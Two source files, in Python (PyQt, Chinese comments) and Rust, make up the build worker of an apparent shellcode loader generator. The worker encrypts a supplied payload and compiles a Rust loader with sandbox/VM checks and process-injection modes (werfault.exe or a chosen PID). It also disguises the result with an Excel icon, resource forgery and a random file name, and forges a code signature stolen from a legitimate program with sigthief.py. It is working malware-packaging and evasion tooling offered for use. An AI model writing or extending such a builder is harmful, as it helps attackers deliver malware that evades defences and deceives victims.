File: gui/worker.py
"""
工作线程模块
负责在后台执行加密、构建和打包任务
"""
import os
import sys
import subprocess
import shutil
import platform
from PyQt5.QtCore import QThread, pyqtSignal
from .config_manager import (
    load_plugins_manifest,
    get_encryption_map,
    get_vm_checks_map,
    get_encryption_feature_map,
    get_run_mode_map,
    get_alloc_mem_feature_map,
    get_default_value
)


class WorkerThread(QThread):
    """
    后台工作线程，执行加密、编译、打包、签名等任务
    """
    log_signal = pyqtSignal(str)
    progress_signal = pyqtSignal(int)
    done_signal = pyqtSignal(str)
    error_signal = pyqtSignal(str)
    
    def __init__(self, parent, params):
        super().__init__(parent)
        self.params = params

    def run(self):
        """执行完整的构建流程"""
        try:
            self._encrypt_payload()
            self._build_rust_project()
            output_file = self._copy_output()
            if self.params['sign_enable']:
                self._sign_executable(output_file)
            self.progress_signal.emit(100)
            self.log_signal.emit('全部完成！')
            self.done_signal.emit(output_file)
        except Exception as e:
            self.error_signal.emit(str(e))

    def _encrypt_payload(self):
        """加密payload"""
        self.progress_signal.emit(0)
        self.log_signal.emit('加密中...')
        self.progress_signal.emit(10)
        
        # 从配置映射到 encrypt.py 所需方法名
        enc_map = get_encryption_map()
        enc_method_arg = enc_map.get(
            self.params['enc_method'], 
            self.params['enc_method']
        )
        
        enc_cmd = [
            sys.executable, 'encrypt.py',
            '-i', self.params['input_bin'],
            '-o', 'src/encrypt.bin',
            '-m', enc_method_arg,
            '-e', self.params.get('encode_method', 'base64')
        ]
        
        result = subprocess.run(enc_cmd, capture_output=True, text=True, check=True)
        self.log_signal.emit(result.stdout)
        if result.stderr:
            self.log_signal.emit(result.stderr)
        
        self.progress_signal.emit(40)

    def _build_rust_project(self):
        """构建Rust项目"""
        self.log_signal.emit('Rust 构建中...')
        
        # 使用用户选择的target
        self.target = self.params.get('target', 'x86_64-pc-windows-msvc')
        
        # 动态生成Cargo feature参数
        features = self._build_features_list()
        features_str = ','.join(features)
        
        self.log_signal.emit(f'本次编译启用 features: {features_str}')
        self.log_signal.emit(f'编译目标: {self.target}')
        
        # 设置环境变量用于生成target.rs
        manifest = load_plugins_manifest()
        run_modes = manifest['run_modes']
        run_mode_id = self.params['run_mode']
        pattern = 1
        for rm in run_modes:
            if rm['id'] == run_mode_id:
                pattern = rm.get('pattern', 1)
                break
        
        env_vars = {}
        if pattern == 2:
            env_vars['RSL_TARGET_PROGRAM'] = self.params.get('target_program', r'C:\Windows\System32\werfault.exe')
        elif pattern == 3:
            env_vars['RSL_TARGET_PID'] = self.params.get('target_pid', '0')
        
        # 设置图标路径环境变量
        env_vars['RSL_ICON_PATH'] = self.params.get('icon_path', 'icons/excel.ico')
        
        # 构建环境变量字符串
        env_cmd_parts = []
        for key, value in env_vars.items():
            env_cmd_parts.append(f'set "{key}={value}" && ')
        
        build_cmd_str = ' '.join([
            'cargo', 'build', '--release',
            '--no-default-features',
            '--target', self.target,
            f'--features={features_str}'
        ])
        
        full_cmd = ''.join(env_cmd_parts) + build_cmd_str
        
        result = subprocess.run(full_cmd, shell=True, capture_output=True, text=True, check=True)
        self.log_signal.emit(result.stdout)
        if result.stderr:
            self.log_signal.emit(result.stderr)
        
        self.progress_signal.emit(50)

    def _build_features_list(self):
        """构建features列表"""
        manifest = load_plugins_manifest()
        features = []
        
        # VM检测features
        vm_map = get_vm_checks_map()
        selected = self.params.get('vm_checks', '').split(',') if self.params.get('vm_checks') else []
        features.extend([vm_map[t] for t in selected if t in vm_map])
        
        # 加密方式feature
        enc_feature_map = get_encryption_feature_map()
        default_enc = get_default_value('encryption') or 'chacha20-aes'
        enc_feature = enc_feature_map.get(
            self.params.get('enc_method', default_enc),
            'decrypt_chacha20_aes'
        )
        features.append(enc_feature)
        
        # 编码方式feature (解码对应)
        encode_method = self.params.get('encode_method', 'base64')
        if encode_method == 'base64':
            features.append('base64_decode')
        elif encode_method == 'base32':
            features.append('base32_decode')
        elif encode_method == 'none':
            features.append('none_decode')
        
        # 运行模式feature
        run_map = get_run_mode_map()
        default_run = get_default_value('run_mode') or 'enum_ui'
        run_feature = run_map.get(
            self.params.get('run_mode', default_run),
            'run_enum_ui'
        )
        features.append(run_feature)
        
        # 内存分配方式feature
        mem_feature_map = get_alloc_mem_feature_map()
        default_mem = get_default_value('alloc_mem_mode') or 'alloc_mem_va'
        mem_mode = self.params.get('mem_mode', default_mem)
        mem_feature = mem_feature_map.get(mem_mode, 'alloc_mem_va')
        features.append(mem_feature)
        
        # 资源伪造
        if self.params.get('forgery_enable'):
            features.append('with_forgery')
        
        # Win7 兼容 feature
        if self.params.get('win7_compat', False):
            features.append('win7')
        
        return features

    def _copy_output(self):
        """复制输出文件"""
        self.log_signal.emit('复制输出...')
        
        src_file = os.path.join('target', self.target, 'release', 'rsl.exe')
        out_dir = 'output'
        
        if not os.path.exists(out_dir):
            os.makedirs(out_dir)
        
        # 生成随机文件名
        import random
        import string
        rand_name = ''.join(random.choices(string.ascii_letters, k=6)) + '.exe'
        dst_file = os.path.join(out_dir, rand_name)
        
        if not os.path.exists(src_file):
            raise FileNotFoundError(src_file)
        
        shutil.copyfile(src_file, dst_file)
        self.log_signal.emit(f'已复制并重命名: {dst_file}')
        
        return dst_file

    def _sign_executable(self, dst_file):
        """伪造签名"""
        app_path = self.params['sign_app']
        if not app_path:
            raise ValueError('未选择被伪造应用的路径！')
        
        sign_out_file = dst_file[:-4] + '_signed.exe'
        sign_cmd = [
            sys.executable,
            os.path.join('sign', 'sigthief.py'),
            '-i', app_path,
            '-t', dst_file,
            '-o', sign_out_file
        ]
        
        result = subprocess.run(sign_cmd, capture_output=True, text=True, check=True)
        self.log_signal.emit(result.stdout)
        if result.stderr:
            self.log_signal.emit(result.stderr)
        
        shutil.move(sign_out_file, dst_file)
        self.log_signal.emit(f'伪造签名完成: {dst_file}')

File: src/bin/worker.rs
use anyhow::{anyhow, Result};
use std::path::Path;
use std::process::Command;
use std::sync::mpsc::{channel, Receiver, Sender};
use std::thread;
use std::fs;
use crate::config::{ConfigManager, PluginsManifest};

#[derive(Debug, Clone)]
pub struct BuildParams {
    pub input_bin: String,
    pub run_mode: String,
    pub vm_checks: String,
    pub enc_method: String,
    pub encode_method: String,
    pub icon_path: String,
    pub sign_enable: bool,
    pub sign_app: Option<String>,
    pub forgery_enable: bool,
    pub mem_mode: String,
    pub target: String,
    pub target_program: String,
    pub target_pid: String,
    pub win7_compat: bool,
}

#[derive(Debug, Clone)]
pub enum WorkerMessage {
    Log(String),
    Progress(u32),
    Done(String),
    Error(String),
}

pub struct BuildWorker {
    manifest: PluginsManifest,
}

impl BuildWorker {
    pub fn new(manifest: PluginsManifest) -> Self {
        BuildWorker { manifest }
    }
    
    pub fn start_build(self, params: BuildParams) -> Receiver<WorkerMessage> {
        let (tx, rx) = channel();
        
        thread::spawn(move || {
            if let Err(e) = self.run_build(&params, &tx) {
                let _ = tx.send(WorkerMessage::Error(format!("{}", e)));
            }
        });
        
        rx
    }
    
    fn run_build(&self, params: &BuildParams, tx: &Sender<WorkerMessage>) -> Result<()> {
        let _ = tx.send(WorkerMessage::Progress(0));
        let _ = tx.send(WorkerMessage::Log("Starting build process...".to_string()));
        
        self.encrypt_payload(params, tx)?;
        self.build_rust_project(params, tx)?;
        let output_file = self.copy_output(params, tx)?;
        
        if params.sign_enable {
            self.sign_executable(&output_file, params, tx)?;
        }
        
        let _ = tx.send(WorkerMessage::Progress(100));
        let _ = tx.send(WorkerMessage::Log("Build completed successfully!".to_string()));
        let _ = tx.send(WorkerMessage::Done(output_file));
        
        Ok(())
    }
    
    fn encrypt_payload(&self, params: &BuildParams, tx: &Sender<WorkerMessage>) -> Result<()> {
        let _ = tx.send(WorkerMessage::Log("Encrypting payload...".to_string()));
        let _ = tx.send(WorkerMessage::Progress(10));
        
        let enc_map = ConfigManager::get_encryption_map(&self.manifest);
        let enc_method_arg = enc_map
            .get(&params.enc_method)
            .cloned()
            .unwrap_or_else(|| params.enc_method.clone());
        
        let output = Command::new("python3")
            .arg("encrypt.py")
            .arg("-i")
            .arg(&params.input_bin)
            .arg("-o")
            .arg("src/encrypt.bin")
            .arg("-m")
            .arg(&enc_method_arg)
            .arg("-e")
            .arg(&params.encode_method)
            .output()?;
        
        if !output.status.success() {
            let stderr = String::from_utf8_lossy(&output.stderr);
            let _ = tx.send(WorkerMessage::Log(format!("Encryption error: {}", stderr)));
            return Err(anyhow!("Encryption failed"));
        }
        
        let stdout = String::from_utf8_lossy(&output.stdout);
        if !stdout.is_empty() {
            let _ = tx.send(WorkerMessage::Log(stdout.to_string()));
        }
        
        let _ = tx.send(WorkerMessage::Progress(40));
        Ok(())
    }
    
    fn build_rust_project(&self, params: &BuildParams, tx: &Sender<WorkerMessage>) -> Result<()> {
        let _ = tx.send(WorkerMessage::Log("Building Rust project...".to_string()));
        
        let features = self.build_features_list(params)?;
        let features_str = features.join(",");
        
        let _ = tx.send(WorkerMessage::Log(format!("Enabled features: {}", features_str)));
        let _ = tx.send(WorkerMessage::Log(format!("Build target: {}", params.target)));
        
        // Determine pattern for target program/pid
        let pattern = self.manifest
            .run_modes
            .iter()
            .find(|r| r.id == params.run_mode)
            .map(|r| r.pattern)
            .unwrap_or(1);
        
        let mut cmd = Command::new("cargo");
        cmd.arg("build")
            .arg("--release")
            .arg("--no-default-features")
            .arg("--target")
            .arg(&params.target)
            .arg(format!("--features={}", features_str));
        
        if pattern == 2 && !params.target_program.is_empty() {
            cmd.env("RSL_TARGET_PROGRAM", &params.target_program);
        } else if pattern == 3 && !params.target_pid.is_empty() {
            cmd.env("RSL_TARGET_PID", &params.target_pid);
        }
        
        cmd.env("RSL_ICON_PATH", &params.icon_path);
        
        let output = cmd.output()?;
        
        if !output.status.success() {
            let stderr = String::from_utf8_lossy(&output.stderr);
            let _ = tx.send(WorkerMessage::Log(format!("Build error: {}", stderr)));
            return Err(anyhow!("Build failed"));
        }
        
        let stdout = String::from_utf8_lossy(&output.stdout);
        if !stdout.is_empty() {
            let _ = tx.send(WorkerMessage::Log(stdout.to_string()));
        }
        
        let _ = tx.send(WorkerMessage::Progress(50));
        Ok(())
    }
    
    fn build_features_list(&self, params: &BuildParams) -> Result<Vec<String>> {
        let mut features = Vec::new();
        
        // VM checks
        let vm_map = ConfigManager::get_vm_checks_map(&self.manifest);
        let selected: Vec<&str> = params.vm_checks.split(',').filter(|s| !s.is_empty()).collect();
        for vm_id in selected {
            if let Some(feature) = vm_map.get(vm_id) {
                features.push(feature.clone());
            }
        }
        
        // Encryption
        let enc_feature_map = ConfigManager::get_encryption_feature_map(&self.manifest);
        let default_enc = ConfigManager::get_default_value(&self.manifest, "encryption")
            .unwrap_or_else(|| "decrypt_ipv4".to_string());
        let enc_feature = enc_feature_map
            .get(&params.enc_method)
            .cloned()
            .unwrap_or_else(|| default_enc.clone());
        features.push(enc_feature);
        
        // Encoding
        match params.encode_method.as_str() {
            "base64" => features.push("base64_decode".to_string()),
            "base32" => features.push("base32_decode".to_string()),
            _ => features.push("none_decode".to_string()),
        }
        
        // Run mode
        let run_map = ConfigManager::get_run_mode_map(&self.manifest);
        let default_run = ConfigManager::get_default_value(&self.manifest, "run_mode")
            .unwrap_or_else(|| "run_create_thread".to_string());
        let run_feature = run_map
            .get(&params.run_mode)
            .cloned()
            .unwrap_or_else(|| default_run.clone());
        features.push(run_feature);
        
        // Memory allocation
        let mem_map = ConfigManager::get_alloc_mem_feature_map(&self.manifest);
        let default_mem = ConfigManager::get_default_value(&self.manifest, "alloc_mem_mode")
            .unwrap_or_else(|| "alloc_mem_va".to_string());
        let mem_feature = mem_map
            .get(&params.mem_mode)
            .cloned()
            .unwrap_or_else(|| default_mem);
        features.push(mem_feature);
        
        // Resource forgery
        if params.forgery_enable {
            features.push("with_forgery".to_string());
        }
        
        // Win7 compatibility
        if params.win7_compat {
            features.push("win7".to_string());
        }
        
        Ok(features)
    }
    
    fn copy_output(&self, params: &BuildParams, tx: &Sender<WorkerMessage>) -> Result<String> {
        let _ = tx.send(WorkerMessage::Log("Copying output...".to_string()));
        
        let src_file = Path::new("target")
            .join(&params.target)
            .join("release")
            .join("rsl.exe");
        
        let out_dir = Path::new("output");
        if !out_dir.exists() {
            fs::create_dir_all(out_dir)?;
        }
        
        // Generate random filename using current timestamp
        let random_name = {
            use std::time::{SystemTime, UNIX_EPOCH};
            let now = SystemTime::now()
                .duration_since(UNIX_EPOCH)
                .unwrap()
                .as_nanos();
            format!("{:x}.exe", now)
        };
        
        let dst_file = out_dir.join(&random_name);
        
        if !src_file.exists() {
            return Err(anyhow!("Build output not found: {:?}", src_file));
        }
        
        fs::copy(&src_file, &dst_file)?;
        let _ = tx.send(WorkerMessage::Log(format!("Copied and renamed: {}", dst_file.display())));
        
        Ok(dst_file.to_string_lossy().to_string())
    }
    
    fn sign_executable(&self, dst_file: &str, params: &BuildParams, tx: &Sender<WorkerMessage>) -> Result<()> {
        let app_path = params.sign_app.as_ref()
            .ok_or_else(|| anyhow!("No application selected for signing"))?;
        
        let sign_out_file = format!("{}_signed.exe", dst_file.trim_end_matches(".exe"));
        
        let output = Command::new("python3")
            .arg("sign/sigthief.py")
            .arg("-i")
            .arg(app_path)
            .arg("-t")
            .arg(dst_file)
            .arg("-o")
            .arg(&sign_out_file)
            .output()?;
        
        if !output.status.success() {
            let stderr = String::from_utf8_lossy(&output.stderr);
            let _ = tx.send(WorkerMessage::Log(format!("Signing error: {}", stderr)));
            return Err(anyhow!("Signing failed"));
        }
        
        let stdout = String::from_utf8_lossy(&output.stdout);
        if !stdout.is_empty() {
            let _ = tx.send(WorkerMessage::Log(stdout.to_string()));
        }
        
        fs::rename(&sign_out_file, dst_file)?;
        let _ = tx.send(WorkerMessage::Log(format!("Signing completed: {}", dst_file)));
        
        Ok(())
    }
}
